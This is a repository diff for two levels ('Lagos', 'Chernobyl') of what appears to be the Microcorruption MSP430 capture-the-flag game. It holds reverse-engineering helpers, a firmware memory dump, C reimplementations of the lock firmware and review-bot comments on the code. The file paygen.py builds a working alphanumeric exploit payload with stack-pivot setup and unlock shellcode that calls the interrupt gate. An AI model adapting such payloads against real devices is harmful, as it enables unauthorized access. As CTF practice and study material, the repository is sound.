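+    print(f"{solution:04x} '{isprintable(bas[0])}{isprintable(bas[1])}'= {solutions[solution]}")
+
+exit()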
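Review bot: `queue.pop(0)` in `bfs` is O(n) on a list, and with `super_valid_chars` seeding 62*62 = 3844 entries and the search admitting every value in `range(0, 0x10000)` the queue grows large enough for that to dominate the run; `from collections import deque`, `queue = deque()` and `current = queue.popleft()` keep the same visiting order at O(1) per pop. The annotation `super_valid_chars:bytes = []` is wrong for a list that is appended ints — `super_valid_chars: list[int] = []` — and `not_in_set(set, ...)` shadows the builtin `set` with its parameter name. `half_pair`, `neg_half_pair`, `not_in_set` and `valid` are not referenced anywhere in the file, and the module-level BFS run plus the bare `exit()` mean the file cannot be imported as a helper without executing the whole table generation; an `if __name__ == '__main__':` guard around the last block would separate the two uses.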
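--- a/16 - Lagos/insgen.py
+++ b/16 - Lagos/insgen.py
@@ -0,0 +1,20 @@
+import string
+import disassemble
+from disassemble import disassemble, dis_bytes
+# Instruction
+
+
+def main():
+    valid_chars = string.digits + string.ascii_uppercase + string.ascii_lowercase
+    char = [0, 0]
+    for char[0] in valid_chars:
+        for char[1] in valid_chars:
+            word=(char[0]+char[1]).encode('ascii')
+
+            print(f"__{word[0]:x}{word[1]:x}_{word.decode('ascii')}AABB: {dis_bytes(word+ b'AABB')}")
+    # for dis in res:
+    # print()
+    # return 0
+
+if __name__ == '__main__':
+    main()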
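Review bot: `import disassemble` followed by `from disassemble import disassemble, dis_bytes` rebinds the name `disassemble` from the module to the function, so the first import is dead and misleading; drop it. `dis_bytes` is called with its default `e='big'`, so the pair `char[0]+char[1]` is decoded as the word whose high byte is `char[0]`, whereas an MSP430 stores the low byte first — if the intent is to see what the two characters decode to when they sit in memory in that order, the call presumably needs `'little'`, which is worth confirming and recording in the `# Instruction` comment that currently has no content. Using the list slots `char[0]` and `char[1]` as `for` targets works but reads oddly; two plain loop variables would make the intent clearer.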
BIN
16 - Lagos/instructions.asm
Normal file
Binary file not shown.
65536
16 - Lagos/lut.txt
Normal file
File diff suppressed because it is too large
65536
16 - Lagos/lut2.txt
Normal file
File diff suppressed because it is too large
BIN
16 - Lagos/memory_clean.bin
Normal file
Binary file not shown.
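--- a/16 - Lagos/memory_clean.txt
+++ b/16 - Lagos/memory_clean.txt
@@ -0,0 +1,63 @@
+
+0000: 0000 4400 0000 0000 0000 0000 0000 0000 ..D.............
+0010: 3041 0000 0000 0000 0000 0000 0000 0000 0A..............
+0020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
+0030: *
+4400: 3140 0044 1542 5c01 75f3 35d0 085a 3f40 1@.D.B\.u.5..Z?@
+4410: 0000 0f93 0724 8245 5c01 2f83 9f4f f446 .....$.E\./..O.F
+4420: 0024 f923 3f40 0102 0f93 0624 8245 5c01 .$.#?@.....$.E\.
+4430: 1f83 cf43 0024 fa23 b012 5e45 32d0 f000 ...C.$.#..^E2...
+4440: fd3f 3040 f246 0412 0441 2453 2183 c443 .?0@.F...A$S!..C
+4450: fcff 3e40 fcff 0e54 0e12 0f12 3012 7e00 ..>@...T....0.~.
+4460: b012 fc45 5f44 fcff 8f11 3152 3441 3041 ...E_D....1R4A0A
+4470: 456e 7465 7220 7468 6520 7061 7373 776f Enter the passwo
+4480: 7264 2074 6f20 636f 6e74 696e 7565 2e00 rd to continue..
+4490: 5265 6d65 6d62 6572 3a20 7061 7373 776f Remember: passwo
+44a0: 7264 7320 6172 6520 6265 7477 6565 6e20 rds are between
+44b0: 3820 616e 6420 3136 2063 6861 7261 6374 8 and 16 charact
+44c0: 6572 732e 0044 7565 2074 6f20 736f 6d65 ers..Due to some
+44d0: 2075 7365 7273 2061 6275 7369 6e67 206f users abusing o
+44e0: 7572 206c 6f67 696e 2073 7973 7465 6d2c ur login system,
+44f0: 2077 6520 6861 7665 0072 6573 7472 6963 we have.restric
+4500: 7465 6420 7061 7373 776f 7264 7320 746f ted passwords to
+4510: 206f 6e6c 7920 616c 7068 616e 756d 6572 only alphanumer
+4520: 6963 2063 6861 7261 6374 6572 732e 0041 ic characters..A
+4530: 6363 6573 7320 6772 616e 7465 642e 0054 ccess granted..T
+4540: 6861 7420 7061 7373 776f 7264 2069 7320 hat password is
+4550: 6e6f 7420 636f 7272 6563 742e 0000 0b12 not correct.....
+4560: 3150 f0ff 3f40 7044 b012 6046 3f40 9044 1P..?@pD..`F?@.D
+4570: b012 6046 3f40 c544 b012 6046 3f40 f944 ..`F?@.D..`F?@.D
+4580: b012 6046 3e40 0002 3f40 0024 b012 5046 ..`F>@..?@.$..PF
+4590: 5f42 0024 0e43 7c40 0900 7d40 1900 073c _B.$.C|@..}@...<
+45a0: 0b41 0b5e cb4f 0000 5f4e 0024 1e53 4b4f .A.^.O.._N.$.SKO
+45b0: 7b50 d0ff 4c9b f42f 7b50 efff 4d9b f02f {P..L../{P..M../
+45c0: 7b50 e0ff 4d9b ec2f c143 0000 3d40 0002 {P..M../.C..=@..
+45d0: 0e43 3f40 0024 b012 8c46 0f41 b012 4644 .C?@.$...F.A..FD
+45e0: 0f93 0324 3f40 2f45 023c 3f40 3f45 b012 ...$?@/E.<?@?E..
+45f0: 6046 3150 1000 3b41 3041 3041 1e41 0200 `F1P..;A0A0A.A..
+4600: 0212 0f4e 8f10 024f 32d0 0080 b012 1000 ...N...O2.......
+4610: 3241 3041 2183 0f12 0312 814f 0400 b012 2A0A!......O....
+4620: fc45 1f41 0400 3150 0600 3041 0412 0441 .E.A..1P..0A...A
+4630: 2453 2183 3f40 fcff 0f54 0f12 1312 b012 $S!.?@...T......
+4640: fc45 5f44 fcff 8f11 3150 0600 3441 3041 .E_D....1P..4A0A
+4650: 0e12 0f12 2312 b012 fc45 3150 0600 3041 ....#....E1P..0A
+4660: 0b12 0b4f 073c 1b53 8f11 0f12 0312 b012 ...O.<.S........
+4670: fc45 2152 6f4b 4f93 f623 3012 0a00 0312 .E!RoKO..#0.....
+4680: b012 fc45 2152 0f43 3b41 3041 0b12 0a12 ...E!R.C;A0A....
+4690: 0912 0812 0b4f 3d90 0600 082c 043c cb4e .....O=....,.<.N
+46a0: 0000 1b53 3d53 0d93 fa23 1e3c 4a4e 0a93 ...S=S...#.<JN..
+46b0: 0324 0c4a 8c10 0adc 1fb3 0524 3d53 cf4e .$.J.......$=S.N
+46c0: 0000 0b4f 1b53 0c4d 12c3 0c10 084b 094c ...O.S.M.....K.L
+46d0: 884a 0000 2853 3953 fb23 0c5c 0c5b 1df3 .J..(S9S.#.\.[..
+46e0: 0d99 0224 cc4e 0000 3841 3941 3a41 3b41 ...$.N..8A9A:A;A
+46f0: 3041 0013 0000 0000 0000 0000 0000 0000 0A..............
+4700: 0000 0000 0000 0000 0000 0000 0000 0000 ................
+4710: *
+ff80: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
+ff90: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
+ffa0: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
+ffb0: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
+ffc0: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
+ffd0: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
+ffe0: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
+fff0: 4244 4244 4244 4244 4244 4244 4244 0044 BDBDBDBDBDBDBD.D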
58
16 - Lagos/paygen.py
Normal file
@ -0,0 +1,58 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
from math import ceil, floor
|
||||||
|
import string
|
||||||
|
|
||||||
|
# Truncation
|
||||||
|
def u16(i:int):
|
||||||
|
return i & 0xffff
|
||||||
|
# Conversion
|
||||||
|
def stob(s: str):
|
||||||
|
return s.encode('ascii', "replace")
|
||||||
|
def btos(b: bytes):
|
||||||
|
return b.decode('ascii', "replace")
|
||||||
|
def btoi(b: bytes):
|
||||||
|
return int.from_bytes(b, 'little')
|
||||||
|
def itob(i: int):
|
||||||
|
return u16(i).to_bytes(2, 'little', signed=u16(i) < 0x8000);
|
||||||
|
|
||||||
|
'''
|
||||||
|
.text 0x4444
|
||||||
|
setup:
|
||||||
|
add #0x674a, sp ; sub #0x1e6e, sp
|
||||||
|
add #0x7a7a, sp ; sub #0x1e6e, sp
|
||||||
|
ret ; j #25c0
|
||||||
|
'''
|
||||||
|
setup_loadaddr = b'4444'
|
||||||
|
setup = b'31504e6731507a7a3041'
|
||||||
|
|
||||||
|
'''
|
||||||
|
.text 0x25c0
|
||||||
|
unlock:
|
||||||
|
mov #0xff00, sr
|
||||||
|
call #0010
|
||||||
|
'''
|
||||||
|
unlock_loadaddr = 0x25c0
|
||||||
|
unlock = b'324000ffb0121000'
|
||||||
|
|
||||||
|
# ret -> #25c0
|
||||||
|
fake_stack = b'c025'
|
||||||
|
|
||||||
|
raddr_position = 0xf
|
||||||
|
setup_position = 0x057
|
||||||
|
fake_stack_position = 0x1b6 # The loop must continue
|
||||||
|
exploit_position = 0x1c0
|
||||||
|
|
||||||
|
payloadbuffer = b'30' * 15
|
||||||
|
payloadbuffer = setup_loadaddr*16
|
||||||
|
payloadbuffer += b'30' * (setup_position - len(payloadbuffer)//2)
|
||||||
|
payloadbuffer += setup
|
||||||
|
payloadbuffer += b'30' * (fake_stack_position - len(payloadbuffer)//2)
|
||||||
|
payloadbuffer += fake_stack
|
||||||
|
payloadbuffer += b'30' * (exploit_position - len(payloadbuffer)//2)
|
||||||
|
payloadbuffer += unlock
|
||||||
|
|
||||||
|
print(payloadbuffer)
|
||||||
|
|
||||||
|
'''
|
||||||
|
444444444444444444444444444444444444444444444444444444444444444430303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030
|
||||||
|
'''
|
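Review bot: `payloadbuffer = b'30' * 15` at the start of the payload assembly is dead code, since the very next line `payloadbuffer = setup_loadaddr*16` overwrites it, and `raddr_position = 0xf`, `from math import ceil, floor` and `import string` are likewise never used, so the intent behind the 15 should either be dropped or folded into the position constants below. The `setup` docstring and its bytes also appear to disagree: the comment lists `add #0x674a, sp` while the hex `31504e67` encodes `add #0x674e, sp`, so one of the two should be corrected to keep the annotation trustworthy. `itob` is never called, and its `signed=u16(i) < 0x8000` toggle is redundant because `u16(i)` is already non-negative and fits two unsigned bytes; `return u16(i).to_bytes(2, 'little')` is equivalent and drops the stray trailing `;`.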
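--- /dev/null
+++ b/17 - Chernobyl/.clang-format
@@ -0,0 +1,96 @@
+
+# Default to Google style
+BasedOnStyle: Google
+
+# Don't derive from file
+DeriveLineEnding: false
+DerivePointerAlignment: false
+
+# Google limits lines to 80 columns. Don't do that.
+ColumnLimit: 0
+
+# Here there be controversy
+IndentWidth: 3
+ConstructorInitializerIndentWidth: 3
+ContinuationIndentWidth: 3
+
+# Alignment checks
+AlignConsecutiveAssignments: true
+AlignTrailingComments: true
+
+# Sort include blocks, and regroup based on include category
+SortIncludes: CaseInsensitive
+IncludeBlocks: Regroup
+
+# Allow short blocks on single line
+AllowShortBlocksOnASingleLine: Always
+AllowShortEnumsOnASingleLine: true
+AllowShortFunctionsOnASingleLine: Inline
+AllowShortIfStatementsOnASingleLine: AllIfsAndElse
+AllowShortLambdasOnASingleLine: Inline
+AllowShortLoopsOnASingleLine: true
+# Except case statements
+AllowShortCaseLabelsOnASingleLine: false
+
+# Line wrapping should not happen, but just in case, keep the args together
+BinPackArguments: true
+BinPackParameters: true
+
+# When bitfield-packing a struct, spaces go after the colon, not before
+BitFieldColonSpacing: After
+
+# By default, braces are obnoxiously wrapped to newlines
+BreakBeforeBraces: Custom
+# Disable that
+BraceWrapping:
+AfterEnum: false
+AfterFunction: false
+AfterNamespace: false
+AfterStruct: false
+AfterUnion: false
+AfterExternBlock: false
+AfterControlStatement: false
+
+BeforeCatch: false
+BeforeElse: false
+BeforeLambdaBody: false
+BeforeWhile: false
+
+IndentBraces: false
+
+SplitEmptyFunction: false
+
+# Don't break before ?:, it looks ugly
+BreakBeforeTernaryOperators: false
+
+# Trim empty lines when there are more than 1
+MaxEmptyLinesToKeep: 1
+
+# Align &*s toward the variable name (i.e. int &number; char *cstring)
+ReferenceAlignment: Pointer
+PointerAlignment: Right
+
+# Put spaces after (int) c_style_casts and template <T>, but !after '!' operator
+SpaceAfterCStyleCast: true
+SpaceAfterLogicalNot: false
+SpaceAfterTemplateKeyword: true
+
+# Put spaces before \.?\= operators, initializer {lists}, inline (parentheses), // comments.
+SpaceBeforeAssignmentOperators: true
+SpaceBeforeCpp11BracedList: true
+SpaceBeforeParens: Always
+SpacesBeforeTrailingComments: 1
+SpacesInLineCommentPrefix:
+Minimum: 1
+# Don't put spaces in case : statements, object : inheritance,
+# for (auto& loops : range), conditional ( statements ), ( parentheses ), [ brackets ]
+SpaceBeforeCaseColon: false
+SpaceBeforeInheritanceColon: false
+SpaceBeforeRangeBasedForLoopColon: false
+SpacesInConditionalStatement: false
+SpacesInParentheses: false
+SpacesInSquareBrackets: false
+
+# Always use LF for line breaks, and NEVER use tabs for indentation
+UseCRLF: false
+UseTab: Never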
BIN
17 - Chernobyl/CFG/Chernobyl_run.png
Normal file
BIN
17 - Chernobyl/CFG/Chernobyl_run.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 416 KiB |
1
17 - Chernobyl/CFG/Chernobyl_run.svg
Normal file
1
17 - Chernobyl/CFG/Chernobyl_run.svg
Normal file
File diff suppressed because one or more lines are too long
After Width: | Height: | Size: 492 KiB |
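--- /dev/null
+++ b/17 - Chernobyl/Code/Makefile
@@ -0,0 +1,59 @@
+
+# ---------- Variables listed below --------- #
+# Executable
+TARGET := chernobyl.out
+
+# Paths to source, include, dependency, and object files
+SPATH = src
+IPATH = inc
+DPATH = dep
+OPATH = obj
+
+# File type of source file
+STYPE = c
+
+VPATH = $(SPATH) $(IPATH) $(DPATH) $(OPATH)
+
+# compiler and compiler flags
+CC = g++
+CFLAGS = -I$(IPATH) -std=c++11 -Os
+
+# list of object files
+SOURCES = $(wildcard $(SPATH)/*.$(STYPE))
+OBJECTS = $(addprefix $(OPATH)/,$(notdir $(SOURCES:.$(STYPE)=.o)))
+
+
+# ----------- Targets listed below ---------- #
+# Some targets aren't real
+.PHONY: all clean run dump
+# Don't autodelete object files:
+.PRECIOUS: $(OPATH)/%.o
+
+all: $(DPATH) $(OPATH) $(TARGET)
+
+dump:
+@echo SOURCES: $(SOURCES)
+@echo OBJECTS: $(OBJECTS)
+@echo TARGET: $(TARGET)
+@echo VPATH: $(VPATH)
+
+clean:
+-rm $(TARGET)
+-rm -r dep obj
+
+run:
+-$(addprefix ./,$(addsuffix ;,$(TARGET)))
+
+$(DPATH) $(OPATH):
+mkdir -p $@
+
+# Make the executable(s)
+%.out: $(OBJECTS)
+$(CC) $(CFLAGS) -o "$@" $^
+# Make the object and dependency files
+$(OPATH)/%.o: $(SPATH)/%.$(STYPE)
+$(CC) $(CFLAGS) -MMD -MF "$(DPATH)/$(@F:.o=.d)" -o "$@" -c "$<"
+
+# --------- Inclusions listed below --------- #
+# use dependencies when rebuilding
+-include $(wildcard $(DPATH)/*.d)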
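Review bot: The object rule writes its `.d` file into `$(DPATH)` and its `.o` into `$(OPATH)` but declares neither directory as a prerequisite, so `make chernobyl.out` on a clean tree (or `all` under `-j`, where `$(DPATH) $(OPATH) $(TARGET)` may be built in any order) can fail before `mkdir -p` has run; make the directories order-only prerequisites of that rule, `$(OPATH)/%.o: $(SPATH)/%.$(STYPE) | $(OPATH) $(DPATH)`, and reduce the default goal to `all: $(TARGET)` so the directories are no longer normal prerequisites whose mtime changes trigger rebuilds. `clean` hardcodes `dep obj` instead of `$(DPATH) $(OPATH)` and uses `-rm` rather than `$(RM) -r`, so renaming the path variables would silently leave stale output behind. `CC = g++` with `-std=c++11` compiles the `.c` sources as C++; if that is intended, a one-line comment saying so saves the next reader a double take. `.PRECIOUS: $(OPATH)/%.o` also keeps a half-written object on interrupt, whereas `.SECONDARY` gives the no-autodelete behaviour the comment asks for without that side effect.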
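--- /dev/null
+++ b/17 - Chernobyl/Code/hashbrek.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python3
+
+# TODO: Actually break the hashes?
+# May not be necessary, just gotta find a way to crash it. Harumph.
+
+def hash(byts):
+ret = 0;
+for c in byts:
+ret += c
+ret = ((ret << 5) - ret) & 0xffff
+return ret
+
+while True:
+try:
+line = input("> ")
+if (line[0] == '~'):
+h = hash(bytes.fromhex(line[1:]));
+else:
+h = hash(line.encode())
+print(f"hash: {h:x}, box: {h&7:x}");
+except EOFError:
+break
+
+print("")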
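Review bot: `if (line[0] == '~'):` raises `IndexError` on an empty line, and since only `EOFError` is caught the prompt loop dies on a bare Enter; guard it with `if line and line[0] == '~':` (or `line.startswith('~')`). `bytes.fromhex(line[1:])` raises `ValueError` on malformed hex for the same reason and is worth catching inside the loop so one typo does not end the session. Minor: `hash` shadows the builtin, and the trailing semicolons on `ret = 0;`, the `h = ...;` line and the `print(...)` line are Python noise.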
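--- /dev/null
+++ b/17 - Chernobyl/Code/inc/chernobyl.h
@@ -0,0 +1,40 @@
+#ifndef CHERNOBYL_H
+#define CHERNOBYL_H
+
+#include "chernobyl_types.h"
+
+
+u16 _main ();
+u16 walk (u16 r15);
+u16 run ();
+
+u16 *create_hash_table (u16 r15, u16 r14);
+u16 add_to_table (u16 r15, u16 r14, u16 r13);
+// Return address of a buffer from the table
+// r15 = buffer address. r14
+u16 get_from_table (void * r15, char * r14);
+u16 hash (char *str);
+u16 rehash (u16 r15, u16 r14);
+
+#define s_4566 "\r\r"
+#define s_4569 "%x [alloc] [p %x] [n %x] [s %x]"
+#define s_4588 " "
+#define s_458b " {%x} [ "
+#define s_4594 "%x "
+#define s_4599 "%x [freed] [p %x] [n %x] [s %x]"
+
+#define s_465e "Heap exhausted; aborting."
+
+#define s_4a38 "Welcome to the lock controller."
+#define s_4a58 "You can open the door by entering 'access [your name] [pin]'"
+#define s_4a95 ""
+#define s_4a96 "No such box."
+#define s_4aa3 "Access granted."
+#define s_4ab3 "Access granted; but account not activated."
+#define s_4ade "Aceess denied" // [sic]
+#define s_4aec "Can not have a pin with high bit set."
+#define s_4b12 "User already has an account."
+#define s_4b2f "Adding user account %s with pin %x."
+#define s_4b54 "Invalid command."
+
+#endif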
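Review bot: The comment above `get_from_table` breaks off mid-sentence (`// r15 = buffer address. r14`) and disagrees with the definition-site comment in chernobyl.c, which describes r15 as the hash table and r14 as the username; suggest replacing the two lines with `// Look up a string in the table; r15 = hash table, r14 = string to look up` and, once confirmed, noting that the `cmp #-0x1, r15` after the call in mc-run.asm treats 0xffff as "not found". The `s_xxxx` macros are named by firmware address, which is a reasonable scheme, but a one-line comment saying the suffix is the string's address in the memory dump would help a reader who has not opened mc-disasm.asm.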
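--- /dev/null
+++ b/17 - Chernobyl/Code/inc/chernobyl_stdlib.h
@@ -0,0 +1,21 @@
+#ifndef CHERNOBYL_STDLIB_H
+#define CHERNOBYL_STDLIB_H
+
+#include "chernobyl_types.h"
+
+// Standard library functions
+// These use MSPGCC calling convention:
+// https://www.ti.com/lit/an/slaa664/slaa664.pdf?ts=1659422621072
+// ( Or see https://nhivp.github.io/msp430-gcc/2018-07-20/function-calling-convention )
+void *_malloc (u16 size);
+void _free (void *ptr);
+u16 _putchar (char c);
+i16 _getchar ();
+void _puts (const char *s);
+void _getsn (char *__restrict buf, u16 length);
+int _strcmp (const char *s1, const char *s2);
+void INT (u16 interrupt);
+
+void swpb (u16 *word);
+
+#endif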
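--- /dev/null
+++ b/17 - Chernobyl/Code/inc/chernobyl_types.h
@@ -0,0 +1,32 @@
+#ifndef CHERNOBYL_TYPES_H
+#define CHERNOBYL_TYPES_H
+
+#include <stdint.h>
+
+typedef uint16_t u16;
+typedef int16_t i16;
+typedef uint8_t u8;
+typedef int8_t i8;
+
+typedef struct registers {
+// Registers = initial_state
+u16 sp; // stack pointer
+u16 sr; // status register
+// General-purpose registers
+// Caller-saved registers
+u16 r4; // GPR 4
+u16 r5; // GPR 5
+u16 r6; // GPR 6
+u16 r7; // GPR 7
+u16 r8; // GPR 8
+u16 r9; // GPR 9
+u16 r10; // GPR 10
+u16 r11; // GPR 11
+// Callee-saved registers / function arguments / return value(s)
+u16 r12; // GPR 12 ; arg 3
+u16 r13; // GPR 13 ; arg 2
+u16 r14; // GPR 14 ; arg 1
+u16 r15; // GPR 15 ; arg 0
+} re;
+
+#endif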
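Review bot: The two group comments look swapped: `// Caller-saved registers` heads r4–r11 and `// Callee-saved registers / function arguments / return value(s)` heads r12–r15, yet the `run` prologue in mc-run.asm pushes r7–r11 on entry and pops them before `ret`, which is the callee preserving them, so r4–r11 are the callee-saved set and the argument registers r12–r15 are caller-saved under the MSPGCC convention the stdlib header links. Suggest `// Callee-saved registers (preserved across calls)` for the first group and `// Caller-saved registers / function arguments / return value(s)` for the second. `// Registers = initial_state` would also read better as a sentence saying what the struct models, since nothing visible in this commit fills a `re` yet (chernobyl_stdlib.c only has `//r.sr = interrupt;` commented out).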
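--- /dev/null
+++ b/17 - Chernobyl/Code/src/chernobyl.c
@@ -0,0 +1,130 @@
+
+#include "chernobyl.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include "chernobyl_stdlib.h"
+#include "chernobyl_types.h"
+
+u16 to_decimal (char *buf) {
+u16 num = 0; // r10
+while (*buf) {
+num *= 10;
+num += *buf - '0';
+buf++;
+}
+return num;
+}
+
+int main (int argc, char **argv) {
+if (argc == 1) {
+char buf[0x600] = {0};
+while (printf(">> "), _getsn (buf, 0x5ff), !feof (stdin)) {
+printf ("hash: %x, dec: %x\n", hash (buf), to_decimal(buf));
+};
+}
+
+if (argc == 2) {
+printf ("hash: %x\n", hash (argv[1]));
+}
+return 0;
+}
+
+u16 _main () {
+run ();
+return 0;
+}
+
+u16 walk (u16 r15) {
+puts (s_4566); // "\n\n"
+printf (s_4569); //%x [alloc] [p %x] [n %x] [s %x]
+return 0;
+}
+
+// 0x4b66: run
+u16 run () {
+// move stack -0x600
+char buf[0x600];
+u16 *hashtable = create_hash_table (0x3, 0x5); // todo: What do these args mean?
+
+// 4b82: Print out some shit
+puts (s_4a38); // "Welcome to the lock controller."
+puts (s_4a58); // "You can open the door by entering 'access [your name] [pin]'"
+puts (s_4a95); // ""
+
+while (1) {
+// 4b9a: zero out the stack buffer
+for (int r14 = 0; r14 < 0x5ff; r14++) {
+buf[r14] = 0;
+}
+// 4bb0: get 0x550 characters -> stack buffer
+_getsn (buf, 0x550);
+// 4bba: loop over the user input:
+u16 index = 0;
+while (buf[index] != 0) {
+// 4bbe: check for 'a'
+if (buf[index] == 'a') {
+index += 7;
+char *name = &buf[index];
+// skip spaces
+while (buf[index++] != ' ') {
+if (buf[index] == 0)
+break;
+};
+} else if (buf[index] == 'n') {
+index += 4;
+// skip spaces
+while (buf[index++] != ' ') {
+if (buf[index] == 0)
+break;
+};
+} else {
+return -1;
+}
+}
+}
+// end of the function
+puts (s_4b54); // "Invalid command."
+return 1;
+}
+
+u16 *create_hash_table (u16 r15, u16 r14) {
+// todo: RE hash table creation
+u8 *buf = (u8 *) malloc (0xa);
+buf[0] = 0;
+return 0;
+}
+
+// Hash the string stored at addr
+u16 hash (char *addr) {
+u16 chr, hash = 0;
+while (*addr) {
+hash = *addr + hash;
+hash = (hash << 5) - hash;
+addr++;
+}
+return hash;
+}
+
+u16 add_to_table (u16 r15, u16 r14, u16 r13) {
+// todo: add_to_table
+return 0;
+}
+
+// get_from_table hash_table* table, string* username
+u16 get_from_table (void *r15, char *r14) {
+u16 h = hash (r14);
+u16 num = ((u16 *) r15)[2];
+u16 power_of_two = (1 << num) - 1;
+power_of_two = (power_of_two & h) << 1;
+num = ((u16 *) r15)[6];
+
+return 0;
+}
+
+u16 rehash (u16 r15, u16 r14) {
+// todo: this function is very long and performs dynalloc
+return 0;
+}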
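Review bot: `printf (s_4569);` in `walk` passes a format string containing four `%x` conversions with no arguments, which is undefined behaviour in C and in practice prints stack garbage; until the real arguments are reverse-engineered use `printf ("%s", s_4569);` (the same caution applies to any future use of `s_4599` and `s_4b2f`). In `run`, both `while (buf[index++] != ' ')` loops test `buf[index] == 0` only after `index` has already been advanced, so input with no space steps past the terminator and the outer `while (buf[index] != 0)` keeps scanning the zeroed tail, whereas the disassembly at 0x4bce–0x4be0 loads and tests the byte before incrementing; `while (buf[index] != 0 && buf[index] != ' ') index++;` follows that order. The `else { return -1; }` branch yields 0xffff from a `u16` function, but the disassembly's unknown-command path (`jnz $+0x82 <run+0x158>` at 0x4c3c) lands on the `puts` of `s_4b54` followed by `mov #0x1, r15`, so the `puts (s_4b54); return 1;` currently stranded after the unreachable `while (1)` belongs in that `else`. `create_hash_table` leaks its `malloc (0xa)` block and returns 0 while `run` stores that in an unread `hashtable`, and `hash` declares `chr` without using it; a `// todo` on the leak and dropping the dead locals keeps `-Wall` quiet until the table layout is done.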
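--- /dev/null
+++ b/17 - Chernobyl/Code/src/chernobyl_stdlib.c
@@ -0,0 +1,87 @@
+#include "chernobyl_stdlib.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include "chernobyl.h"
+#include "chernobyl_types.h"
+
+#define HEAP_BASE 0x2400
+
+void __trap_interrupt () {
+// Hardware will do something here
+return;
+}
+
+void set_w (u16* addr, u16 value) {
+*((u16 *) &addr) = value;
+}
+
+u16 get_w (u16 *addr) {
+return *((u16 *) addr);
+}
+
+void *_malloc (u16 size) {
+// if heap not initialized, initialize the heap
+// if (get_w (HEAP_BASE + 4)) {
+// u16 heap_ptr = HEAP_BASE;
+// set_w (heap_ptr, HEAP_BASE);
+// set_w (heap_ptr + 2, HEAP_BASE);
+// }
+// create a new block on the heap
+
+// return the address of the new block
+return 0;
+}
+
+void _free (void *ptr) {
+return;
+}
+
+u16 _putchar (char c) {
+putchar (c);
+return c;
+}
+
+i16 _getchar () {
+return getchar ();
+}
+
+void _puts (const char *s) {
+u8 character = 0;
+while (character = *(u8 *) s++) {
+_putchar (character);
+}
+return;
+}
+
+void _getsn (char *__restrict buf, u16 length) {
+fgets (buf, length, stdin);
+buf[strnlen(buf, length) - 1] = '\0';
+return;
+}
+
+int _strcmp (const char *s1, const char *s2) {
+while (*s1 == *s2) {
+if (*(++s1) == 0) {
+break;
+}
+s2++;
+}
+return *s2 - *s1;
+}
+
+void INT (u16 interrupt) {
+swpb (&interrupt);
+interrupt |= 0x8000;
+//r.sr = interrupt;
+__trap_interrupt ();
+return;
+}
+
+void swpb (u16 *word) {
+((u8 *) word)[0] = ((u8 *) word)[0] ^ ((u8 *) word)[1];
+((u8 *) word)[1] = ((u8 *) word)[1] ^ ((u8 *) word)[0];
+((u8 *) word)[0] = ((u8 *) word)[0] ^ ((u8 *) word)[1];
+}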
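Review bot: `set_w` writes through `&addr`, i.e. into its own pointer parameter, so the target word is never modified; it should be `*addr = value;`. `_getsn` ignores the `fgets` return value and then does `buf[strnlen(buf, length) - 1] = '\0'`, which on EOF with an empty buffer indexes `buf[-1]` and on a line longer than `length` strips a real character instead of the newline; check the return and only chop a trailing newline, e.g. `if (fgets (buf, length, stdin)) buf[strcspn (buf, "\n")] = '\0';`. `_strcmp` returns non-zero for equal strings because `s2` is not advanced on the `break` path ("ab" vs "ab" yields `'b' - 0`), and its sign is the reverse of `strcmp`; unless the firmware's strcmp genuinely behaves that way, `while (*s1 && *s1 == *s2) { s1++; s2++; } return *s1 - *s2;` is the intended semantics. `_puts`' `while (character = *(u8 *) s++)` is an assignment used as a condition, which gcc warns about; an extra pair of parentheses signals it is deliberate.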
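--- /dev/null
+++ b/17 - Chernobyl/Interrupt Listing
@@ -0,0 +1,45 @@
+4.3 Interrupt Listing
+The LockIT Pro has an augmented MSP430 CPU with a callgate at address
+0x10 causing a software interrupt. The interrupts are described below.
+
+INT 0x00.
+The putchar interrupt: sends a single byte to the display.
+Takes one argument with the character to print.
+
+INT 0x01.
+The getchar interrupt: reads a single byte of buffered input.
+Takes no arguments.
+
+INT 0x02.
+The gets interrupt: read a specific number of bytes to standard input.
+Takes two arguments. The first is the address to place the string, the
+second is the maximum number of bytes to read. Null bytes are not handled
+specially null-terminated.
+
+INT 0x10.
+Turn on DEP: pages are either executable or writable but never both.
+Takes no arguments.
+
+INT 0x11.
+Mark as a page as either only executable or only writable.
+Takes two one arguments. The first argument is the page number, the
+second argument is 1 if writable, 0 if executable.
+
+INT 0x20.
+The rand interrupt: request a random 16-bit number.
+Takes no arguments.
+
+INT 0x7D.
+Interface with the HSM-1. Set a flag in memory if the password passed in is
+correct.
+Takes two arguments. The first argument is the password to test, the
+second is the location of a flag to overwrite if the password is correct.
+
+INT 0x7E.
+Interface with the HSM-2. Trigger the deadbolt unlock if the password is
+correct.
+Takes one argument: the password to test.
+
+INT 0x7F.
+Interface with deadbolt to trigger an unlock if the password is correct.
+Takes no arguments.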
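--- /dev/null
+++ b/17 - Chernobyl/instructions.txt
@@ -0,0 +1,3 @@
+main:
+sp -= 8;
+run()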
1150
17 - Chernobyl/mc-disasm.asm
Normal file
1150
17 - Chernobyl/mc-disasm.asm
Normal file
File diff suppressed because it is too large
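--- /dev/null
+++ b/17 - Chernobyl/mc-run.asm
@@ -0,0 +1,207 @@
+4b66 <run>
+4b66: 0b12 push index
+4b68: 0a12 push r10
+4b6a: 0912 push r9
+4b6c: 0812 push r8
+4b6e: 0712 push r7
+; allocate 0x600 buffer on stack. Woah!
+4b70: 3150 00fa add #0xfa00, sp
+
+; r8 = create_hash_table (0x3, 0x5)
+4b74: 3e40 0500 mov #0x5, r14
+4b78: 3f40 0300 mov #0x3, r15
+4b7c: b012 7847 call #0x4778 <create_hash_table>
+4b80: 084f mov r15, r8 ; save result
+
+; print out some shit
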